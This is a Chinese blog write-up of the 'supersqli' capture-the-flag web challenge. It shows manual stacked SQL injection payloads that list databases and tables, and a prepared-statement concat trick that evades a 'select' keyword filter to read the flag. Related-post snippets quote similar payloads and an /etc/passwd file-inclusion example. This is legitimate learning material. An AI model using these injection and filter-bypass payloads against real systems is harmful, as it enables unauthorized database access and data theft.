攻防世界WP-web-supersqli

最新推荐文章于 2025-01-17 21:33:56 发布
最新推荐文章于 2025-01-17 21:33:56 发布
阅读量402 收藏 1
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wallacegen/article/details/108608888
版权

在这里插入图片描述这是一道sql注入的题目。首先在输入框输入1和2,能够分别返回查询数据。可以看到urlhttp://220.249.52.133:31003/?inject=1,初步推断inject为注入点。
我们输入1',报错。
在这里插入图片描述之前有考虑用sqlmap来做,但是没做出来= = ,网页源代码里面也有提示<!-- sqlmap是没有灵魂的 -->,但是从sqlmap的结果可以知道,使用的databasesupersqli
尝试手工注入。
首先查看有哪些数据库1';show databases;#
在这里插入图片描述有两个数据库比较可疑,ctftrainingsupersqli
先来看看ctftraining,查询一下它的表1';use ctftraining;show tables;#
在这里插入图片描述继续。1';use ctftraining;show columns from FLAG_TABLE;#
在这里插入图片描述提示not_flag,估计flag不在里面,不过也试一下。
1';use ctftraining;sEt @sql=concat('se','lect * from & FLAG_TABLE;');prEpare stmt from @sql;execute stmt;其他几个表也查过了,没有东西。
然后看另外一个database,supersqli
1';show tables;#
在这里插入图片描述查询第一个table
1';sEt @sql=concat('se','lect * from 1919810931114514 ;');Prepare stmt from @sql;execute stmt;就得到了flag
最开始直接使用 select ,发现select被过滤,然后尝试大小写绕过,替换t为\x74都不行。最后用的这种预处理的方法执行sql语句。

攻防世界web进阶区supersqli
gongjingege的博客
07-25 1927
打开链接,初步判断应该是sql注入 顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入 先1’,报错 再–+,发现被正则过滤,大小写也不行 看了看大佬的wp,堆叠注入(呜,新名词。。。) inject=1’;show databases;# inject=1’;show tables;# 看一下这几个表 1’;show columns from words;# 1’;show columns from 1919810931114514;# (字符串为表名操作时要加反
攻防世界-web高手进阶区
zji
04-25 6899
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
[强网杯 2019]随便注
Is_Linmouren的博客
09-25 199
[强网杯 2019]随便注 知识点 堆叠注入 尝试了一下单引号闭合;存在堆叠注入;过滤了 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);右键看源码有一个注释 <!-- sqlmap没有灵魂--> 于是试了下sqlmap,可以跑出数据库跑不出表; 动手:payload:`1’;show database;show tables; array(2) { [0]=> stri
wp-攻防世界WEB-supersqli
0pt1mus
07-10 279
转自个人博客:0pt1mus 首先先判断注入类型。可以通过输入一些字符串,在判断是否存在注入的同时判断注入类型。 ?inject=1-0 ?inject=1 \ ?inject=1' 测试发现在输入1'和1 \时会出现报错信息。 发现该位置是一个字符型的注入。因此构造注入语句判断该注入有几个注入位置。 ?inject=1' order by x %23 这里的%23是#的url编码,因为#在url中代表这锚点,有自己的意义,一次要编码。也可使用--+、--%20等。 当x为3时报错,因此之后两列
攻防世界supersqli
qq_45955869的博客
05-27 425
提示:攻防世界supersqli
攻防世界web--supersqli
m0_60715541的博客
10-27 374
一道攻防世界上面的sql注入
攻防世界web高手进阶区 supersqli
weixin_61835841的博客
04-26 432
提示:方法千千万,适合自己才是最强的! 工具 火狐 分析 看题目--随便注,supersqli 以及网页内容猜测是sql注入 1.输入1,发现变量为inject 2.查看网页源代码,发现提示sqlmap没有灵魂,意识到应该不能用sqlmap跑,尝试手工注入 3.输入 1' union select 1--+ 提示被过滤,preg_match可自行百度,过滤之后则不能用select这条命令 4,尝试堆叠注入 Stacked injections(堆叠注入)从名词的含义..
攻防世界-web进阶区
楼阁de猫的博客
10-30 1066
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
CTF_WP-攻防世界web题解(1),2024年最新网络安全零基础
2401_83974607的博客
04-17 1183
题目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
CTF_WP-攻防世界web题解(1),网络安全面试资料集合
碧海朝天素
04-08 926
查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile接下看重点看checkfile函数,白名单被写死,return true的情况只有三种file在白名单中在file末尾加了个?
攻防世界 - Web - Level 2 | supersqli
Blue17 の 小窝
12-23 856
起序:在 Web 题遇到的,也算是骚姿势吧,希望帮到有需要的同志。一、简介MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。在数据库中是可以的,但是我们考虑到目标使用 PHP 建立与数据库的一次性链接之后传递数据,再断开链接,所以对于 PHP 而言,每次链接都是单独的,如果分开执行,相当与建立了两次链接,会导致。
攻防世界Web 高手进阶区 supersqli (菜鸡蛋版本)
m0_52513952的博客
02-24 401
从进入高手进阶区开始,就越发觉得自己会的东西好少,php之前没学过,导致我压根看不懂之前那些需要读懂php源码才能拿到flag的题,于是我一跳再跳,终于看到了亲切而熟悉的“sql”,一道sql注入题,应该有机会能自己拿到flag了!!然而。。。
sqlmap使用方法
tothemoon的博客
03-03 511
直接进入正题: 环境:python2.7 python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” --dbs 爆数据库库名 python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1...
记录攻防世界关卡 supersqli
qq_56559508的博客
11-13 364
攻防世界关卡 supersqli
【ctfshow--sql注入】
qq_74240553的博客
03-02 1264
ctfshow--sql
[极客大挑战 2019]LoveSQL
qq_45237160的博客
01-09 636
然后爆表名,有geekuser,l0ve1ysq1两个表 注意:数据库名字要用单引号括起来。(这里我在2那个地方注入会报错,只能在3那里注入成功,不知道什么原因)找到flag对应的password,成功发现flag。访问目标地址,出现下面酷酷的页面,最上面有提示。万能语句注入测试,成功,判断为单引号字符型注入。我用sqlmap扫了一下,果然扫不出来注入点。order by为4时报错,为3时页面正常。尝试联合注入,成功,判断列数为3列。接下来爆破数据库名,为geek。接下来测试回显点,为2,3。
攻防世界web解题[进阶](二)
weixin_46703850的博客
03-05 824
攻防世界web解题[进阶](二)
2025.1.16——三、supersqli 绕过|堆叠注入|handler查询法|预编译绕过法|修改原查询法
最新发布
2402_87387800的博客
01-17 1364
查看源码,发现一句话:用sqlmap没有灵魂的。所以可以先用sqlmap跑一下,然后尝试手工注入。
CTF题记——暑假计划第一周
m0re's blog
07-10 1513
本文目录前言Web[强网杯 2019]随便注Misc[WUSTCTF2020]alison_likes_jojo[SUCTF2018]single dog 前言 学期结束,暑假开始,博客也开始正常更新。 至少一周三篇吧。emmm,这一周的话,应该是一篇CTF题记、一篇漏洞原理、一篇kali linux的学习。 Web Web类的题目是在BUUCTF挑选的。 [强网杯 2019]随便注 查看源码,看到sqlmap没有灵魂的应该不能使用sqlmap,先尝试其他的办法。 直接提交1 然后判断闭合,输入单引号报
攻防世界-web-file_include
12-06
在网络安全领域,文件包含漏洞(File Inclusion Vulnerability)是一种常见且危险的安全漏洞。文件包含漏洞通常出现在Web应用程序中,允许攻击者通过特定的参数或输入来包含并执行任意文件,从而可能导致服务器被完全控制或敏感信息泄露。 文件包含漏洞主要分为两种类型: 1. **本地文件包含(Local File Inclusion, LFI)**: - 攻击者可以包含服务器上的本地文件。 - 例如,攻击者可以通过修改URL参数来包含服务器的敏感配置文件或密码文件。 2. **远程文件包含(Remote File Inclusion, RFI)**: - 攻击者可以包含远程服务器上的文件。 - 例如,攻击者可以通过修改URL参数来包含远程服务器上的恶意脚本,从而执行任意代码。 ### 示例 假设有一个简单的PHP脚本用于包含文件: ```php <?php $file = $_GET['file']; include($file); ?> ``` 在这个例子中,攻击者可以通过修改`file`参数来包含任意文件。例如,访问以下URL: ``` http://example.com/page.php?file=/etc/passwd ``` 攻击者可以获取服务器的`/etc/passwd`文件内容。 ### 防御措施 1. **输入验证**:确保用户输入的文件名符合预期,例如只允许包含特定目录下的文件。 2. **使用白名单**:定义一个允许包含的文件列表,拒绝所有不在白名单中的文件。 3. **禁用远程文件包含**:在PHP配置文件中设置`allow_url_include`为`Off`,防止远程文件包含。 4. **最小权限原则**:确保Web服务器进程只具有必要的文件访问权限。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wallacegen

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值